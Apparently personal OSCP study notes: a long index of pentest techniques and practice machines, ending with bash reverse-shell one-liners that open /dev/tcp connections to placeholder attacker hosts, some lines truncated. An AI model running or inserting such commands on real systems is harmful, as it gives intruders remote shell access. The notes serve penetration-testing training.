Index

My OSCP Preparation Notes

  1. Scanning
    1. Recon
      1. network
      2. web
        1. gobuster
        2. wfuzz
        3. webdav
        4. jenkin
    2. Nmap
      1. My way
        1. TCP
          1. Step1-Live host
          2. Step2-nmap Full port scan
          3. Step3-Run nmap Full port scan
          4. Step4-nmap Open port scan
          5. Step5-Run Open port scan
        2. UDP
          1. Step2-nmap Full port scan
          2. Step3-Run nmap Full port scan
          3. Step4-nmap Open port scan
          4. Step5-Run Open port scan
        3. FinalScanPart1
        4. FinalScanPart2
    3. Port Knock
  2. Enumeration
    1. HTTP
      1. Gobuster
      2. Nikto
      3. dirsearch
      4. WFuzz
        1. wfuzz username
      5. Command Injection
      6. Login Bypass
      7. Droopal Scan
      8. SSRF
      9. Hydra post form
      10. cewl
    2. FTP-21
      1. Download file from ftp
      2. Autobind ftp when ftp is permission denied for local user
      3. Remeber while uploading file on ftp
    3. SSH
      1. SSH Tunneling / Pivoting
      2. enum_ssh
      3. rbash shell esacping
      4. Login with RSA
      5. Decrypt RSA
      6. When bruteforcing hydra don't work
      7. lshell bypass
      8. different shell and their errors
      9. port kncoking
    4. SMB
      1. Check smb version
    5. SNMP
      1. snmp_enum
      2. onesixyone scanning for ips
    6. MS SQL
      1. Microsoft_sql_enum
      2. Error based SQL
      3. boolean based
      4. Time based SQLi
      5. SQL Injection (SQL MAP)
      6. Blind sql
    7. finger_enum_user.sh
      1. Enum Image
    8. Telnet
    9. Pop3
    10. CMS
    11. Uncommon Port Exploitation search/Enum
    12. Steg extract
    13. RDP
    14. James 4555
    15. MDB tool
    16. OS
      1. linux
        1. commands
        2. tty
        3. basic enumeration
        4. suid
        5. cron
        6. grep
      2. windows
        1. basic commands
        2. samba version
        3. search
        4. version
  3. Shell
    1. msfvenom
      1. msf
    2. windows
    3. shell
    4. one liner
      1. php
      2. one liner
      3. infosec one liner
    5. powershell
    6. MSFVenom & Metasploit
      1. MSFVenom-payload
        1. Windows
        2. Linux
        3. Web Payload
        4. Binaries
      2. Metasploit
        1. meterpreter
        2. Meterpreter shell code
        3. MsfVenom Handler
      3. Netcat on windows
  4. Intrective shell
    1. Pseudo shell
      1. python
      2. bash
      3. awk
      4. perl
      5. ruby
      6. lua
      7. IRB
      8. tcpdump
      9. vi
      10. nmap
    2. Full intractive shell
      1. Magic on netcat
    3. Reverse shell
      1. bash
      2. python
      3. ruby
      4. Java
      5. Telnet
      6. netcat
      7. PHP
      8. Gawk
      9. URL reverseshell
      10. bypass & os command php
      11. curl
    4. Reverse Shell with Powercat
  5. File Transfer
    1. tftp
    2. http
    3. linux
    4. windows
    5. scp
    6. Transfer
      1. Windows
        1. Pwershell
        2. Cert Util
        3. TFTP
        4. SCP
        5. netcat
        6. Debug
        7. bitsadmin
        8. smb
        9. rdp
      2. Linux
        1. FTP
        2. TFTP
        3. SCP
        4. netcat
        5. curl
        6. Wget
        7. With no tool
  6. WINDOWS - Privilege Escalation
    1. WINDOWS - Sharup Results
    2. WINDOWS - Kernel
    3. WINDOWS - Services (Binpath)
    4. WINDOWS -Services (Unquoted path)
    5. WINDOWS - Services (Registry)
    6. WINDOWS - Registry (Autorun)
    7. WINDOWS - Registry(AlwaysInstallElevated
    8. WINDOWS - PasswordMining (Memory)
    9. WINDOWS -Password (Registry)
    10. WINDOWS - Password (config files)
    11. WINDOWS -Scheduled task (Missing binary)
    12. WINDOWS -Startup Application
    13. WINDOWS - Passthehash
    14. WINDOWS - Unquoted Path Service
      1. adding new user
      2. rdp and stickykeys
    15. WINDOWS - (AlwaysInstallElevated)
      1. 1st method - msfvenom
      2. 2nd method - administrator
      3. 3rd way via msf
    16. WINDOWS - Automated Script
      1. Windows-Exploit-suggester
      2. Windows Gather Applied Patches
      3. Sherlock
      4. JAWS – Just Another Windows (Enum) Script
      5. powerup
    17. My Priv esc tech (Windows)
      1. mimiketz if discover protected SID files
      2. Login with obtained creds with psexec and powershell & smbclient
      3. Finding permission & actual file path of shortcut file or .lnk file
      4. icacls & cacls for find file & folder permissions and Edit permission
      5. Discovered VM on target loaction
      6. Discoverd .mdb backup
      7. Discovered .kdbx Keepass database
      8. search file recursively
      9. List hidden files
      10. Got .dmp file extract with volatality
      11. group.xml file with enocded password
      12. Get that "pass" out of the ADS backup.zip
      13. disable firewall enable rdp
      14. Finding windows version from a file
      15. got SAM System file use pwdump to dump hashes
      16. Windows
        1. Ebowla + Token Impersonation
        2. Non intractive powershell file execution
        3. add user
        4. Convert Ptython2exe
        5. Manual Priv Check
        6. audit priv
  7. LINUX - Privilege Escalation
    1. LINUX - /etc/passwd -deeply
      1. openssl
      2. python
      3. perl
      4. mkpasswd
      5. php
    2. LINUX - Sudo -deeply
      1. Traditional Method to assign Root Privilege
      2. Default Method to assign Root Privilege
      3. find - Allow Root Privilege to Binary commands
      4. Allow Root Privilege to Binary Programs - Spawn shelll
        1. perl
        2. python
        3. less
        4. awk - spawn
        5. man
        6. vi
        7. Allow Root Privilege to Shell Script
        8. bash script - spawn
        9. python script - spawn
        10. c script - spawn
        11. Allow Sudo Right to other Programs
        12. Env
        13. ftp
        14. socat
        15. scp
    3. LINUX - SUID - NMAP
    4. LINUX - LD_Preload
    5. LINUX - SUID - vim-tiny
    6. LINUX -writable
      1. cron
    7. LINUX -CRON
      1. cron
    8. LINUX - Automated Script
      1. linenum
      2. Linuxprivchecker
      3. linuxexploitsuggester2
      4. Bashark
      5. beroot
    9. LINUX - capabilities capability
      1. caoability
    10. LINUX - Binaries for escalation
      1. zip
      2. wget
        1. passwd entry
      3. wget -2
      4. cat
      5. time
      6. Taskset
      7. git
      8. cp
      9. tmux
      10. tmux -2
      11. ed
      12. sed
      13. pip
      14. lxd
      15. socat
      16. scp
      17. capabilities
      18. perl
      19. docker
      20. perl -2
      21. tmp.py
      22. vi
      23. systemctl
      24. tar
      25. id-disk
      26. id-games
      27. python
      28. crontab
      29. tcpdump
      30. strace
      31. ssh
      32. make
      33. wine
      34. ftp
      35. micro
      36. mysql
      37. Simon
      38. tcpdump
      39. ht
      40. sls
      41. apt-get
      42. ed
      43. mawk
    11. LINUX - Exploiting SUDO CVE-2019-14287
  8. Buffer Overflow
    1. Minishare - Exploitation
    2. Brain Pan - Exploitation
  9. bruteforce
    1. ssh
    2. rdp
    3. ftp
    4. hashcat
    5. gpp-decrypt
    6. wp
    7. john
    8. hydra
    9. cewl and crunch
    10. medusa
    11. ncrack
    12. wfuzz
    13. fcrackzip
    14. keepass
    15. password Cracking
      1. zip
      2. NTLM
      3. /etc/shadow
      4. kbd keepass
      5. RSA Decrypting
      6. SHA512 $6$ shadow file
      7. MD5 $1$ shadow file
      8. john RAW MD5
      9. MD5 Apache webdav file $arp1$
      10. SHA1
      11. Auth Proxy
      12. WordPress (PHPASS) windows
      13. Crack MD5 windows
      14. $5$
      15. $krb5tgs$23$ Kerberos 5 hash
  10. compiling
  11. Tunneling
  12. Imp Tools

OSCP Practice (HTB & Vulnhub)

  1. HTB - linux
    1. tartarsauce
    2. nineveh
    3. haircut
    4. sunday
    5. poison
    6. swagshop
  2. HTB - windows
    1. legacy
    2. devel
    3. bastard
    4. optimum
    5. granny
    6. jeeves -juicypotato
    7. chatterbox
  3. HTB -ippsecc windows
    1. access
    2. active
    3. Arctic
    4. arkham
    5. bastard
    6. bastion
    7. blue
    8. bounty
    9. brainfuck
    10. chatterbox
    11. devel
    12. granny
    13. grandpa
    14. jeeves
    15. node
    16. kotarak
    17. lame
    18. legacy
    19. mantis
    20. netmon
    21. optimum
    22. querier
    23. secnotes
    24. oracle
  4. HTB -ippsecc linux
    1. Ariekei - docker
    2. Aragog - xxe
    3. Apocalyst - wp
    4. bank
    5. bart
    6. bashed
    7. beep
    8. bitlab
    9. blocky
    10. canape - db
    11. carrier
    12. chaos
    13. charon
    14. crimestoppers
    15. cronos
    16. curling
    17. dab - wfuzz
    18. DevOops
    19. Dropzone
    20. enterprise
    21. europa
    22. falafel
    23. flujab
    24. FluxCapacitor
    25. fortune - nfs
    26. FriendZone
    27. frolic - play
    28. haircut
    29. hawk
    30. haystack
    31. heist
    32. help
    33. irked
    34. jarvis
    35. lazy
    36. luke
    37. networked
    38. nibble
    39. nineveh
    40. zipper
    41. october
    42. onetwoseven
    43. oz
    44. poison
    45. popcorn
    46. sense
    47. shocker
    48. sneaky
    49. solidstate
    50. Stratosphere
    51. sunday
    52. swagshop
    53. tenten
    54. valentine
    55. waldo
    56. wall
    57. zetta
    58. teacher
    59. tatarsauce
    60. postman
  5. htbwithout msf - ranakhalil
    1. Bashed (linux)
    2. Devel (windows)
    3. Lame (linux)
    4. legacy (windows)
    5. Optimum (windows)
    6. Arctic (Windows)
    7. Shocker (linux)
    8. Valentine (linux)
    9. nibble (linux)
    10. cronos (linux)
    11. Blue (windows)
    12. Irked (linux)
    13. Friendzone (linux)
    14. brainfuck (linux)
    15. beep (linux)
    16. nineveh (linux)
    17. Active (Windows)
    18. sense (freebsd)
    19. solidstate (linux)
    20. node (linux)
    21. Poison (freebsd)
    22. Sunday (solaris)
    23. Swagshop (linux)
    24. Jarvis (linux)
    25. Networked (linux)
    26. TartarSauce (linux)
    27. LaCasaDePapel (linux)
    28. Hawk (linux) - drupal
    29. lightweight (linux)
    30. Devoops (linux)
    31. falafel (linux)
    32. kotarak (linux)
    33. bastard (windows)
    34. granny (windows)
    35. grandpa (windows)
    36. bounty (windows) gobuster - webconfig -juicy
    37. jerry (windows)
    38. chatterbox (windows)
    39. Sillo (windows)
    40. Conceal (Windows)
    41. Netmon (windows)
    42. jeeves (windows) jenkin
    43. bart (windows)
    44. tally (windows)
    45. jail
    46. safe
    47. bankrobber
  6. Vulnhub
    1. Bsides Vancouver
    2. raven 1
    3. raven 2
    4. acid 1
    5. violator
    6. troll 3
    7. pinkypalace v2
    8. pinkypalace v1
    9. digital world
      1. joy
      2. bravery
      3. mercy
      4. development
      5. torment
    10. skytower
    11. IMF
    12. troll1
    13. troll 2
    14. /dev/random sleepy
    15. BILLY MADISON
    16. wallabys-nightmare
    17. solidstate- james
    18. web developer - wp
    19. zico 1
    20. lin.security
    21. lord of the root - mysql udf
    22. pwnos 2.0
    23. sickos
    24. vulnos 2
    25. Mr. Robot 1
    26. stapler
    27. firstileaks
    28. kioptix 2014
    29. kioptix 1.3
    30. kioptix 1.2
    31. kioptix 1.1
    32. kioptix 1
    33. metasploitable 3
    34. metasplotiable 2
    35. metasploitable 1
  7. Vulnhub2
    1. sunset desk
    2. me and my gf 1
    3. sunset sunrise
    4. UA Literally vulnerable
    5. in plain sight 1
    6. HA: Dhanush
    7. HA: Chanakya
    8. djinn
    9. Jigsaw
    10. evm1
    11. mumbai 1
    12. gears-of-war-ep1
    13. chakravyuh
    14. ha-avengers-arsenal
    15. ha-naruto
    16. joker - joomla
    17. isro
    18. hackerfest
    19. bossplayersctf
    20. Misdirection
    21. armour
    22. ha-wordy- wordpress
    23. dc8
    24. silky
    25. sunset dawn
    26. sunset dawn
    27. Prime
    28. teuchter
    29. violator
    30. symfonos4
    31. dc-7 - drupal
    32. ai web 2
    33. hack 6 day
    34. digitalworld-localtorment
    35. hack-the-gemini-inc2
    36. dev-random-k2-vm-boot2root
    37. hack the gemini
    38. ai web 1
    39. hack-the-lin-security - mast
    40. oracle padding
    41. nezuko-1-vulnhub
    42. minu-v2
    43. digitalworld-local-joy
    44. symfonos2
    45. Matrix-3
    46. pumpkinraising
    47. symfonos1
    48. W1R3S.inc VM
    49. hack the de ice
    50. hack-kevgir
    51. vulnos-1
    52. dexter
    53. pwnlab
    54. sputnik-1 splunk
    55. dc1

bash

Bash Reverse Shells

exec /bin/bash 0&2>&0
0<&196;exec 196<>/dev/tcp/x.x.x.x


exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&| while read line; do $line 2>&5 >&5; done  
# or:
while read line 0<&5; do $line 2>&5 >&5; done



bash -i >& /dev/tcp/x.x.x.x